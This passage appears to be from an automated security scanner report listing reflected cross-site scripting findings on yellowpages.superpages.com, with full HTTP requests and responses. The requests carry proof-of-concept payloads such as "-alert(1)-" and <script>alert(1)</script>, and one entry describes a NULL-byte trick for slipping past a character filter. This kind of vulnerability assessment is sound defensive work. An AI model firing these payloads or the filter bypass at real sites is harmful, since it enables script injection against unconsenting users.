Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common98ab9&quot;-alert(1)-&quot;d45a7fa5aaf/js/swfobject.js
Server: Unspecified
Set-Cookie: JSESSIONID=36DFAAE7A032362EAD1EE07FE700AD0E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:27 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common98ab9"-alert(1)-"d45a7fa5aaf/js/swfobject.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.631. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/swfobject.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df462"-alert(1)-"539d2934731 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/jsdf462"-alert(1)-"539d2934731/swfobject.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsdf462&quot;-alert(1)-&quot;539d2934731/swfobject.js
Server: Unspecified
Set-Cookie: JSESSIONID=C59E3AC4220944843B48F6BB847E4A3D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:35 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsdf462"-alert(1)-"539d2934731/swfobject.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.632. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/swfobject.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8519c"-alert(1)-"64c92015151 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/swfobject.js8519c"-alert(1)-"64c92015151 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/swfobject.js8519c&quot;-alert(1)-&quot;64c92015151
Server: Unspecified
Set-Cookie: JSESSIONID=534F43F8840C3F0B4E24401AC93C69ED; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:46 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
llowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/swfobject.js8519c"-alert(1)-"64c92015151?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.633. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/widget.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 633b9"-alert(1)-"357d38575b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common633b9"-alert(1)-"357d38575b/js/widget.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common633b9&quot;-alert(1)-&quot;357d38575b/js/widget.js
Server: Unspecified
Set-Cookie: JSESSIONID=EF961C373B22D3D46A32D7CCF7FFBD15; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:08 GMT
Cache-Control: private
Content-Length: 36075


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common633b9"-alert(1)-"357d38575b/js/widget.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.634. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/widget.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd66"-alert(1)-"3845f6ea7bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/jsdfd66"-alert(1)-"3845f6ea7bb/widget.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsdfd66&quot;-alert(1)-&quot;3845f6ea7bb/widget.js
Server: Unspecified
Set-Cookie: JSESSIONID=0081BD1CF81E1EE984F6C8482C688002; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:16 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsdfd66"-alert(1)-"3845f6ea7bb/widget.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.635. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/widget.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcb24"-alert(1)-"a6a108b5958 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/widget.jsbcb24"-alert(1)-"a6a108b5958 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/widget.jsbcb24&quot;-alert(1)-&quot;a6a108b5958
Server: Unspecified
Set-Cookie: JSESSIONID=843B6CF9DEDBEBDE61C92986F1356639; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:23 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
/yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/widget.jsbcb24"-alert(1)-"a6a108b5958?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.636. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/shared.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f8b6"-alert(1)-"067297a1807 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common1f8b6"-alert(1)-"067297a1807/shared.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common1f8b6&quot;-alert(1)-&quot;067297a1807/shared.js
Server: Unspecified
Set-Cookie: JSESSIONID=6C20F9C369195FD6680789B4DF391F6D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:06 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common1f8b6"-alert(1)-"067297a1807/shared.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.637. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/shared.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d77a"-alert(1)-"d7d525d2174 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/shared.js5d77a"-alert(1)-"d7d525d2174 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/shared.js5d77a&quot;-alert(1)-&quot;d7d525d2174
Server: Unspecified
Set-Cookie: JSESSIONID=8C5DF724BAACBD276D5052291066409F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:14 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
p://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/shared.js5d77a"-alert(1)-"d7d525d2174?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.638. http://yellowpages.superpages.com/listings.jsp [C parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /listings.jsp

Issue detail

The value of the C request parameter is copied into the HTML document as plain text between tags. The payload %00e5acd<script>alert(1)</script>93fce6bf183 was submitted in the C parameter. This input was echoed as e5acd<script>alert(1)</script>93fce6bf183 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /listings.jsp?C=florists%00e5acd<script>alert(1)</script>93fce6bf183 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 500 Internal Server Error
Server: Unspecified
Set-Cookie: JSESSIONID=C5E4B03A766E89FAC74949B1AE645437; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Thu, 03 Feb 2011 17:10:53 GMT
Connection: close


<!--

-->


                                                                        <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="ht
...[SNIP]...
<div title=java.lang.String>javax.servlet.forward.query_string=C=florists%00e5acd<script>alert(1)</script>93fce6bf183</div>
...[SNIP]...

1.639. http://yellowpages.superpages.com/listings.jsp [C parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /listings.jsp

Issue detail

The value of the C request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b00f4"%3balert(1)//9ea80311ee5 was submitted in the C parameter. This input was echoed as b00f4";alert(1)//9ea80311ee5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /listings.jsp?C=floristsb00f4"%3balert(1)//9ea80311ee5 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=8C1509CAA35A56F034FAD97133ED8997; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=C:floristsb00f4%22%3Balert%281%29%2F%2F9ea80311ee5$; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 57369
Date: Thu, 03 Feb 2011 17:10:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
lines. */
/* 09-04-08: CMM New logic to track errors via Omniture. */
s.pageName= "Error Page Try Again";
s.pageType = "errorPage";
s.prop35 = "???omniture.error.tracking.NLF???";
s.prop39 = "floristsb00f4";alert(1)//9ea80311ee5";
s.prop6 = "Dallas";
s.prop7 = "TX";
s.prop8 = "";
s.eVar10 = "Dallas TX";
var s_code=s.t();
if(s_code)
document.write(s_code);
//-->
...[SNIP]...

1.640. http://yellowpages.superpages.com/listings.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /listings.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 277d5"-alert(1)-"5f0b41eeee6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /listings.jsp277d5"-alert(1)-"5f0b41eeee6 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /listings.jsp277d5&quot;-alert(1)-&quot;5f0b41eeee6
Server: Unspecified
Set-Cookie: JSESSIONID=8E53E473DA04106852BE1CA9427A533A; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:10:16 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/listings.jsp277d5"-alert(1)-"5f0b41eeee6?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.641. http://yellowpages.superpages.com/listings.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /listings.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eb2e"-alert(1)-"eb20ccb0e37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /listings.jsp?6eb2e"-alert(1)-"eb20ccb0e37=1 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=D605CA0AE799843045E67761B4B8FFA3; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 56970
Date: Thu, 03 Feb 2011 17:10:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
ges.com';
var var_account = 'Superpagescom';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/listings.jsp?6eb2e"-alert(1)-"eb20ccb0e37=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.642. http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /mapbasedsearch/mapsearch.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 443ae"-alert(1)-"9a43d5cbd11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch443ae"-alert(1)-"9a43d5cbd11/mapsearch.jsp HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /mapbasedsearch443ae&quot;-alert(1)-&quot;9a43d5cbd11/mapsearch.jsp
Server: Unspecified
Set-Cookie: JSESSIONID=BBEB9F1133B421096148BD47E50E8096; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:11:00 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
ttp://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/mapbasedsearch443ae"-alert(1)-"9a43d5cbd11/mapsearch.jsp?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.643. http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /mapbasedsearch/mapsearch.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd6e6"-alert(1)-"4f9032749d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/mapsearch.jspdd6e6"-alert(1)-"4f9032749d1 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /mapbasedsearch/mapsearch.jspdd6e6&quot;-alert(1)-&quot;4f9032749d1
Server: Unspecified
Set-Cookie: JSESSIONID=6A56F54F7F3562CEA77C1D9E1165869B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:11:15 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
ges.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jspdd6e6"-alert(1)-"4f9032749d1?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.644. http://yellowpages.superpages.com/profile.jsp [LID%3D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profile.jsp

Issue detail

The value of the LID%3D request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5f6c"-alert(1)-"89fbe9b4764 was submitted in the LID%3D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profile.jsp?LID%3Dd5f6c"-alert(1)-"89fbe9b4764 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=56C7E4A7E9BE4417CC27D724944372C2; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 56887
Date: Thu, 03 Feb 2011 17:10:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
om';
var var_account = 'Superpagescom';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profile.jsp?LID%3Dd5f6c"-alert(1)-"89fbe9b4764=";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.645. http://yellowpages.superpages.com/profile.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profile.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c50ad"-alert(1)-"eb234e6d437 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profile.jspc50ad"-alert(1)-"eb234e6d437 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /profile.jspc50ad&quot;-alert(1)-&quot;eb234e6d437
Server: Unspecified
Set-Cookie: JSESSIONID=4BAED70D8FFB9064D8585BBF87B9B20C; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:10:27 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/profile.jspc50ad"-alert(1)-"eb234e6d437?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.646. http://yellowpages.superpages.com/profile.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profile.jsp

Issue detail

